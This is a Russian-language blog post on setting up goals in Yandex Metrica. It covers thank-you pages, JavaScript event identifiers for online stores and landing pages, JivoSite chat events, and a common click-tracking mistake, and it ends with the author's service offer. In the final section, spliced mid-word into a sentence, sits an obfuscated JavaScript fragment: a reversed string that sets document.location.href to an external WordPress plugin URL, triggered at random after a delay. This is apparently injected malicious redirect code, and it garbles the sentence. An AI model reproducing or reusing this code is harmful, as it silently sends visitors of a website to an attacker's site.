Цель в метрике. Что это такое и для чего нужна
Цели в метрики — это конкретные действия, выполненные посетителем сайта. Например, посещение какой-либо страницы вашего сайта или оформление заказа.
Цели в основном делятся на 2 типа: конверсионные и ретаргетинговые.
Конверсионная цель
Означает завершение сценария, который привел к получению вами контакта потенциального клиента. Например, посетитель перешел на ваш сайт, полистал его, отправил заявку и в момент, когда его номер телефона отправился вам, потенциального клиента перебросило на страницу благодарности. В данном случае посещение страницы благодарности и есть конверсионная цель.
Ретартегинговая цель
Создается для того, чтобы отследить посетителя, на которого планируем нацеливать ретаргетинговые объявления или создавать сегменты похожих аудиторий. Это может быть посетитель, выполнивший не весь сценарий, который должен был привести к заявки. Например, посетитель вашего сайта накидал полную корзину товара, но в конечном счете так и не сделал заказ. Или посетитель, оставивший заявку через какую-либо определенную форму, и нам нужно собрать похожую на него аудиторию.
Работа целей — показать таких посетителей вашего сайта.
Конверсионные цели помогут правильно анализировать и повышать эффективность вашей рекламной кампании. Вот наглядный пример того, как цели дают информацию в метрику:
В данном случае цели показывают какие конкретно площадки РСЯ давали максимальный эффект. Благодаря этим данным можно заблокировать площадки с наименьшим результатом и вложить максимум средств на площадки, которые давали хороший результат. Как следствие — увеличить эффективность отдачи рекламы, не увеличивая размер рекламного бюджета.
Цели устанавливаются несколькими способами, в зависимости от условия их достижения. Это может быть посещение страницы. К примеру, страница благодарности, на которую попадает пользователь, после отправки формы. Или это может быть JavaScript-событие (например, клик по номеру телефона в шапке сайта), такая цель устанавливается через идентификаторы в код сайта. Т.е. для реализации вам обязательно понадобится программист. Делать это своими руками — опасное занятие. Можно либо повредить сайт, либо неправильно установить и получать не верные данные.
Для разных типов сайтов устанавливаются разные типы целей.
Страница благодарности — цель для любого типа сайта
Самый просто, рабочий и адекватный вариант цели — страница благодарности. Она подходит для любого типа сайта:
- Landing Page
- Сайт-визитка
- Интернет магазин
- Портал или форум
Все, что вам нужно сделать, это создать на своем сайте страницу по типу вот такой:
И настроить сайт таким образом, чтобы при любом действии, которое означает отправку заявки вам, посетителя автоматически перебрасывало на данную страницу.
После этого вам нужно зайти в метрику, нажать на шестеренку вот так:
Далее переходите на вкладку «цели» и жмите «добавить цель»:
Теперь просто добавьте ссылку на вашу страницу благодарности и цель готова:
Не забудьте сохранить:)
Установка целей для интернет магазинов
Эта информация для тех, кто решил пойти по сложному пути и не делать цель через страницу благодарности.
В данном сценарии у вас не получится сразу приступить к установке целей, в первую очередь тут понадобится выписать все варианты сценариев, при которых вы можете получить контакт потенциального клиента.
Списки целей для интернет магазина
Я выделю основные варианты целей, которые встречаются чаще всего, на вашем сайте они будут свои:
- Кнопка — «оформить заказ» или «отправить заказ». Та самая кнопка, после нажатия которой вы получаете контакты вашего потенциального клиента. Не перепутайте с кнопкой, которая переводит посетителя из корзины на оформление заказа. Вам нужна именно та кнопка, которая завершает процедуру оформления заказа. Кнопка «заказать в 1 клик».
- Кнопка «нашли дешевле».
- Цели для онлайн консультантов (идентификаторы вы можете взять у технической поддержки сервиса, через который осуществляете онлайн консультацию).
- Клик по номеру телефона (по клику перекидывает вашего потенциального клиента на набор номера телефона).
- Цели на любые оставшиеся формы обратной связи.
В любом случае обязательно пройдитесь по всему магазину, убедитесь, что захватите все конверсионные цели.
Регистрация идентификаторов целей для магазина
Теперь вам нужно зарегистрировать «идентификаторы» для целей в метрике. Для этого переходите в метрику, настройку целей (как показывала на скриншотах немного выше) и нажав на кнопку «Добавить цель», выбирайте раздел «JavaScript-событие».
В окошко «название» пишите название своей цели. В окошко «идентификатор цели», пишите идентификатор (он выдумывается из головы, главное писать на английском или транслитом, чтобы они не повторялись и не дублировались с каким-либо кодом сайта).
После того, как зарегистрируете идентификаторы, передавайте ваши доступы к метрике вашему программисту, коды он из метрики возьмет уже сам.
Частая ошибка при установке целей
В процессе установки целей на кнопки программисты часто делают ошибку. Вот хороший пример, кнопка заказать в 1 клик на сайте моего клиента:
Изначально его программист поставил цель на клик по этой кнопке. Но тут есть нюанс. Если нажать кнопку, то всплывает вот такая форма:
И получается, что нажать кнопку купить в 1 клик может уйма людей, однако сколькие в конечном счете заполнят форму, нажмут кнопку «отправить» и форма отправится?
Вам нужно проследить, чтобы ваш программист установил цель именно на отправку формы внутри, а не на клик для открытия формы и даже не на клик по кнопке «Отправить» — в противном случае, если форма заполнена не верно, отправка не произойдет, но конверсия будет отправлена в метрику, т.к. цель будет стоять на клик по кнопке.
Установка целей для Landing Page и сайтов визиток
Тут у нас с вами снова 2 варианта — либо страница благодарности, либо события, как в интернет магазине. Если вы дошли до этой части статьи, значит от страницы благодарности уже отказались, идем сразу к целям через события.
В первую очередь вам нужно переписать все формы, какие у вас есть на сайте.
Давайте на примере одного из моих партнерских сайтов: eldom-spb.ru
Обратный звонок в шапке сайта, квиз на первом экране, сметы (квартиры, дачные дома, таунхаусы, коттеджи, офисы, коммерческие помещения), форма захвата «бронь цены», «экскурсия по объектам», форма захвата «приоритеты».
Теперь заходим в метрику, нажимаем шестеренку и начинаем процесс регистрации целей:
Переходим во вкладку цели и жмем «добавить цель»:
В окошко «название цели», пишем название формы, в окошко «идентификатор цели» пишем идентификатор (выдумываем, пишем на английском):
Теперь передаем вашему программисту доступы от метрики, он установит идентификаторы в код сайта.
После установки не забудьте проверить цели и обязательно обратите внимание, чтобы все работало так, как описано в разделе этой статьи: частая ошибка.
Установка целей для онлайн консультантов
Для установки целей на онлайн консультант вам нужно только зарегистрировать идентификаторы конкретных онлайн консультантов в метрике.
Разберем на примере онлайн консультанта JivoSite. Чтобы установить его цели, вам нужно обратиться в тех поддержку сервиса. Я так и сделала:
Перейдя по ссылке, видим список идентификаторов, которые можем зарегистрировать для этого онлайн консультанта в метрике:
Выбираем только те, которые означают состоявшийся контакт с потенциальным клиентом. Для живо сайта это идентификаторы:
- JivoClientinitiatechat — Чат начат со стороны клиента.
- JivoProactiveinvitationaccepted — Клиент принял активное приглашение, написав сообщение в ответ.
- JivoClientansweronagentrequest — Оператор вручную начал диалог с клиентом через функцию посетители, а посетитель ответил, отправив сообщение в чат.
- JivoCallbackrequested — Клиент нажал на кнопку “перезвоните мне” в форме заказа обратного звонка.
- JivoOfflinemessagesent — Клиент отправил оффлайн-сообщение.
Все остальные идентификаторы не устанавливайте (может оказаться, что на момент чтения вами статьи там добавились новые идентификаторы, ознакомьтесь и поставьте именно те, которые нужны для обозначения контакта с клиентом).
Устанавливаем все так же, как и ранее. Нажимаем в настройке метрики «добавить цель», выбирайте JavaScript событие. В окно «название» пишите название цели, в окно идентификатор цели пишите идентификатор, который взяли на сервисе онлайн консультанта (тут уже сами идентификатор не выдумываем).
Например:
Не захламляйте метрику целями
На этапе запуска проекта в вашей метрике должны находиться только конверсионные цели, без излишеств.
На примере тоже же JivoSite.
У них десятки вариантов целей. Поставите все и в результате статистика рекламной кампании выдаст вот такую картину:
И это сайт, который на самом деле за неделю работы не выдал ни 1-й заявки. Зато владелец сайта установил все цели, какие только нашел:) И на онлайн консультант все и на посещение страниц сайта и на время, проведенное на сайте:) На все, что душе угодно.
Результат? За неделю потрачено примерно 10 000 рублей и эти данные никак нельзя использовать, т.к. они не настоящие. Деньги потрачены на ветер.
Чем я могу вам помочь с целями?
Я однозначно не смогу прописать цели в код вашего сайта (если это не конструктор Platformalp или сайт на Elementoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor), для этого вам потребуется программист или можете рискнуть сами, если не боитесь.
Могу бесплатно проверить верно ли зарегистрированы идентификаторы — 1 раз (второй уже будет стоить 1000 рублей), но не смогу узнать правильно ли они установлены в коде, т.к. я не программист.
Так же, если вам не хочется писать идентификаторы самостоятельно, могу подработать вашим секретарем и сделать это за вас:)
Пройдусь по вашему сайту, составлю список всех форм и вариантов взаимодействия с клиентом, создам идентификаторы и зарегистрирую их в метрике (вам останется лишь отдать доступы к метрике программисту, чтобы он установил их в код). Актуальная стоимость в разделе услуг.